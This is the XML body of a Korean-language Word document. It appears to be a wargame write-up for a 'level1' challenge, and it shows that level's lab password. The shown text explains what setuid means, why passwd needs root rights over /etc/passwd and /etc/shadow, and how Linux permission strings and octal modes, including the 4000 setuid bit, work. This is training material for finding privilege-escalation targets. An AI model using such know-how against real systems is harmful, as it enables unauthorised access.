          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>assword :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00B47D91">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> level1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B47D91" w:rsidRDefault="00B47D91" w:rsidP="0040417D">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AA5087" w:rsidRDefault="00AA5087" w:rsidP="0040417D">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5543550" cy="1847850"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="그림 0" descr="dsfsdfsd_%C1%A6%B8%F1_%BE%F8%C0%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fsdfsd_%C1%A6%B8%F1_%BE%F8%C0%BD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8533" cy="184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087" w:rsidRDefault="00AA5087" w:rsidP="0040417D">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AA5087" w:rsidRPr="00AA5087" w:rsidRDefault="00AA5087" w:rsidP="00AA5087">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5087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>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA5087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>setuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA5087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>란</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AA5087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>?=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00AA5087" w:rsidRPr="00AA5087" w:rsidRDefault="00AA5087" w:rsidP="00AA5087">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AA5087" w:rsidRPr="00AA5087" w:rsidRDefault="00AA5087" w:rsidP="00AA5087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AA5087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먼저</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5087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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>setuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>가 걸린 파일이란 것은</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5087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 xml:space="preserve"> 사용자가</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5087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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA5087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리눅스에서</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA5087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그 파일을 실행하는 동안에는 파일 소유주의 권한을 갖는다는 의미입니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5087" w:rsidRPr="00AA5087" w:rsidRDefault="00AA5087" w:rsidP="00AA5087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AA5087" w:rsidRPr="00AA5087" w:rsidRDefault="00AA5087" w:rsidP="00AA5087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AA5087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이게</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5087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왜 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>필요하냐면</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA5087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, 예를 들어 비밀번호를 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>바꾸기위해</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA5087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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA5087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[user] 명령어를 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>사용할때는</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA5087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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA5087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프로그램 내부에</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5087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 xml:space="preserve">서 </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>/etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>와 /etc/shadow 파일을 수정해야 하는데,</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5087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 xml:space="preserve"> 그</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5087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파일들은 모두 root권한을 가져야만 수정할 수 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5087" w:rsidRPr="00AA5087" w:rsidRDefault="00AA5087" w:rsidP="00AA5087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AA5087" w:rsidRPr="00AA5087" w:rsidRDefault="00AA5087" w:rsidP="00AA5087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AA5087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이런</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5087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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>이유때문에</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA5087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필요한 개념입니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5087" w:rsidRPr="00AA5087" w:rsidRDefault="00AA5087" w:rsidP="00AA5087">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AA5087" w:rsidRPr="00AA5087" w:rsidRDefault="00AA5087" w:rsidP="00AA5087">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5087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>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA5087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>리눅스의</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA5087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 xml:space="preserve"> 권한 표기법=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5087" w:rsidRPr="00AA5087" w:rsidRDefault="00AA5087" w:rsidP="00AA5087">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AA5087" w:rsidRDefault="00AA5087" w:rsidP="00AA5087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AA5087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힌트의</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5087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파일을 찾을</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5087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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5087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때는 먼저 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>리눅스의</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA5087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권한 표기법을 알아야 </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>합니다.</w:t>
      </w:r>
      <w:r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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5087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잠시</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5087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후에 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>리눅스</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA5087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파일권한을 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>보게되면</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA5087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, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>예를들어</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA5087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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5087" w:rsidRPr="00AA5087" w:rsidRDefault="00AA5087" w:rsidP="00AA5087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AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>rwxr-xr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA5087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-- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>라는게</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA5087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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>보일겁니다</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5087" w:rsidRPr="00AA5087" w:rsidRDefault="00AA5087" w:rsidP="00AA5087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AA5087" w:rsidRPr="00AA5087" w:rsidRDefault="00AA5087" w:rsidP="00AA5087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AA5087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맨</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5087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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>첫번째</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA5087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- 의 의미는 -이면 파일, d이면 디렉터리라는 것입니다</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r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.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5087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그</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AA5087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다음 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>rwx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA5087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의 의미는 소유주의 권한은 read, write, execute 가 가능하게 주어졌다는 것입니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5087" w:rsidRPr="00AA5087" w:rsidRDefault="00AA5087" w:rsidP="00AA5087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AA5087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그</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5087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다음 r-x 의 의미는 소유 그룹의 권한은 read, execute 가 가능하게 주어졌다는 것입니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5087" w:rsidRPr="00AA5087" w:rsidRDefault="00AA5087" w:rsidP="00AA5087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AA5087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그</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5087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다음 r-- 의 의미는 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>그외</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA5087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사용자의 권한은 read 만 가능하게 주어졌다는 것입니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5087" w:rsidRPr="00AA5087" w:rsidRDefault="00AA5087" w:rsidP="00AA5087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AA5087" w:rsidRPr="00AA5087" w:rsidRDefault="00AA5087" w:rsidP="00AA5087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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>rwxr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>xr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>-- 을 숫자로 표기하기도 하는데, 숫자로 표기하면 754입니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5087" w:rsidRPr="00AA5087" w:rsidRDefault="00AA5087" w:rsidP="00AA5087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AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>r은 4, w는 2, x는 1을 의미하고 존재하는 권한을 각각 더해주면 됩니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D14EC3" w:rsidRDefault="00D14EC3" w:rsidP="00AA5087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AA5087" w:rsidRPr="00AA5087" w:rsidRDefault="00AA5087" w:rsidP="00AA5087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AA5087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왜</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5087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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>이렇냐면</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>, 컴퓨터 내부적으로는 3bit로 각 사용자의 권한을 표시합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5087" w:rsidRPr="00AA5087" w:rsidRDefault="00AA5087" w:rsidP="00AA5087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AA5087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read권한은 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>100 ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AA5087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write권한은 010, execute권한은 001 이므로 각각 10진수로 4, 2, 1입니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5087" w:rsidRPr="00AA5087" w:rsidRDefault="00AA5087" w:rsidP="00AA5087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AA5087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그래서</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5087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이런 숫자가 나오는 것입니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5087" w:rsidRPr="00AA5087" w:rsidRDefault="00AA5087" w:rsidP="00AA5087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AA5087" w:rsidRPr="00AA5087" w:rsidRDefault="00AA5087" w:rsidP="00AA5087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AA5087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그리고</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5087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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>setuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA5087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는 4000, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>setgid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>는 2000, sticky bit는 1000으로 표시하고</w:t>
      </w:r>
      <w:r w:rsidR="00D14EC3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, </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5087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각</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5087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특수권한을 갖는다면 그만큼의 숫자를 더해주면 됩니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5087" w:rsidRPr="00AA5087" w:rsidRDefault="00AA5087" w:rsidP="00AA5087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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA5087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예를들어</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA5087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위에서 예로든 권한에 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>setuid를</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA5087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더해주면, -rwsr-xr--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>로</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA5087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바뀌게 되고, 숫자로는 4754가 됩니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5087" w:rsidRPr="00AA5087" w:rsidRDefault="00AA5087" w:rsidP="00AA5087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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
